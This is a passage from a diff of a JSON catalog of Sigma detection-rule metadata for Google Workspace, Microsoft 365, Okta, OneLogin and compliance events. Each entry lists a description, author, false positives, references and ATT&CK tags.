"tags": [ - "attack.impact" - ] - }, - "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", - "value": "Google Cloud VPN Tunnel Modified or Deleted" - }, - { - "description": "Detects when an an application is removed from Google Workspace.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/26", - "falsepositive": [ - "Application being removed may be performed by a System Administrator." - ], - "filename": "gworkspace_application_removed.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", - "value": "Google Workspace Application Removed" - }, - { - "description": "Detects when an API access service account is granted domain authority.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "gworkspace_granted_domain_api_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", - "value": "Google Workspace Granted Domain API Access" - }, - { - "description": "Detects when multi-factor authentication (MFA) is disabled.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/26", - "falsepositive": [ - "MFA may be disabled and performed by a system administrator." - ], - "filename": "gworkspace_mfa_disabled.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", - "value": "Google Workspace MFA Disabled" - }, - { - "description": "Detects when an a role is modified or deleted in Google Workspace.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "gworkspace_role_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", - "value": "Google Workspace Role Modified or Deleted" - }, - { - "description": "Detects when an a role privilege is deleted in Google Workspace.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/24", - "falsepositive": [ - "Unknown" - ], - "filename": "gworkspace_role_privilege_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", - "value": "Google Workspace Role Privilege Deleted" - }, - { - "description": "Detects when an Google Workspace user is granted admin privileges.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/23", - "falsepositive": [ - "Google Workspace admin role privileges, may be modified by system administrators." - ], - "filename": "gworkspace_user_granted_admin_privileges.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "google_workspace", - "refs": [ - "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", - "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", - "value": "Google Workspace User Granted Admin Privileges" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_activity_by_terminated_user.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", - "value": "Activity Performed by Terminated User" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "User using a VPN or Proxy" - ], - "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", - "value": "Activity from Anonymous IP Addresses" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_activity_from_infrequent_country.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "0f2468a2-5055-4212-a368-7321198ee706", - "value": "Activity from Infrequent Country" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1537" - ] - }, - "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", - "value": "Data Exfiltration to Unsanctioned Apps" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_from_susp_ip_addresses.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", - "value": "Activity from Suspicious IP Addresses" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2020/07/06", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_impossible_travel_activity.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", - "value": "Microsoft 365 - Impossible Travel Activity" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_logon_from_risky_ip_address.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", - "value": "Logon from a Risky IP Address" - }, - { - "description": "Alert for the addition of a new federated domain.", - "meta": { - "author": "@ionsor", - "creation_date": "2022/02/08", - "falsepositive": [ - "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." - ], - "filename": "microsoft365_new_federated_domain_added.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", - "https://www.sygnia.co/golden-saml-advisory", - "https://o365blog.com/post/aadbackdoor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.003" - ] - }, - "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", - "value": "New Federated Domain Added" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", - "meta": { - "author": "austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_potential_ransomware_activity.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", - "value": "Microsoft 365 - Potential Ransomware Activity" - }, - { - "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", - "meta": { - "author": "Sorina Ionescu", - "creation_date": "2022/02/08", - "falsepositive": [ - "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." - ], - "filename": "microsoft365_pst_export_alert.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ] - }, - "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", - "value": "PST Export Alert Using eDiscovery Alert" - }, - { - "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", - "meta": { - "author": "Nikita Khalimonenkov", - "creation_date": "2022/11/17", - "falsepositive": [ - "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." - ], - "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" - ], - "tags": [ - "attack.collection", - "attack.t1114" - ] - }, - "uuid": "6897cd82-6664-11ed-9022-0242ac120002", - "value": "PST Export Alert Using New-ComplianceSearchAction" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/22", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_susp_inbox_forwarding.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", - "value": "Suspicious Inbox Forwarding" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" - ], - "tags": [ - "attack.exfiltration" - ] - }, - "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", - "value": "Suspicious OAuth App File Download Activities" - }, - { - "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", - "meta": { - "author": "austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_unusual_volume_of_file_deletion.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1485" - ] - }, - "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", - "value": "Microsoft 365 - Unusual Volume of File Deletion" - }, - { - "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", - "meta": { - "author": "austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "microsoft365_user_restricted_from_sending_email.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "m365", - "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1199" - ] - }, - "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", - "value": "Microsoft 365 - User Restricted from Sending Email" - }, - { - "description": "Detects when an the Administrator role is assigned to an user or group.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Administrator roles could be assigned to users or group by other admin users." - ], - "filename": "okta_admin_role_assigned_to_user_or_group.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "413d4a81-6c98-4479-9863-014785fd579c", - "value": "Okta Admin Role Assigned to an User or Group" - }, - { - "description": "Detects when a API token is created", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_api_token_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", - "value": "Okta API Token Created" - }, - { - "description": "Detects when a API Token is revoked.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_api_token_revoked.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", - "value": "Okta API Token Revoked" - }, - { - "description": "Detects when an application is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_application_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", - "value": "Okta Application Modified or Deleted" - }, - { - "description": "Detects when an application Sign-on Policy is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", - "value": "Okta Application Sign-On Policy Modified or Deleted" - }, - { - "description": "Detects when an attempt at deactivating or resetting MFA.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/21", - "falsepositive": [ - "If a MFA reset or deactivated was performed by a system administrator." - ], - "filename": "okta_mfa_reset_or_deactivated.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" - ], - "tags": [ - "attack.persistence" - ] - }, - "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", - "value": "Okta MFA Reset or Deactivated" - }, - { - "description": "Detects when an Network Zone is Deactivated or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_network_zone_deactivated_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", - "value": "Okta Network Zone Deactivated or Deleted" - }, - { - "description": "Detects when an Okta policy is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Okta Policies being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "okta_policy_modified_or_deleted.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "1667a172-ed4c-463c-9969-efd92195319a", - "value": "Okta Policy Modified or Deleted" - }, - { - "description": "Detects when an Policy Rule is Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_policy_rule_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", - "value": "Okta Policy Rule Modified or Deleted" - }, - { - "description": "Detects when an security threat is detected in Okta.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_security_threat_detected.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" - ], - "tags": "No established tags" - }, - "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", - "value": "Okta Security Threat Detected" - }, - { - "description": "Detects when unauthorized access to app occurs.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "User might of believe that they had access." - ], - "filename": "okta_unauthorized_access_to_app.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", - "value": "Okta Unauthorized Access to App" - }, - { - "description": "Detects when an user account is locked out.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/12", - "falsepositive": [ - "Unknown" - ], - "filename": "okta_user_account_locked_out.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "okta", - "refs": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", - "value": "Okta User Account Locked Out" - }, - { - "description": "Detects when an user assumed another user account.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "onelogin_assumed_another_user.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "onelogin", - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", - "value": "OneLogin User Assumed Another User" - }, - { - "description": "Detects when an user account is locked or suspended.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/12", - "falsepositive": [ - "System may lock or suspend user accounts." - ], - "filename": "onelogin_user_account_locked.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "onelogin", - "refs": [ - "https://developers.onelogin.com/api-docs/1/events/event-resource/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", - "value": "OneLogin User Account Locked" - }, - { - "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "default_credentials_usage.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "qualys", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" - ], - "tags": "No established tags" - }, - "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", - "value": "Default Credentials Usage" - }, - { - "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "firewall_cleartext_protocols.yml", - "level": "low", "logsource.category": "firewall", "logsource.product": "No established product", "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" - ], - "tags": "No established tags" - }, - "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", - "value": "Cleartext Protocol Usage" - }, - { - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "meta": { - "author": "Alexandr Yampolskyi, SOC Prime", - "creation_date": "2019/03/26", - "falsepositive": [ - "Unknown" - ], - "filename": "group_modification_logging.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.cisecurity.org/controls/cis-controls-list/", - 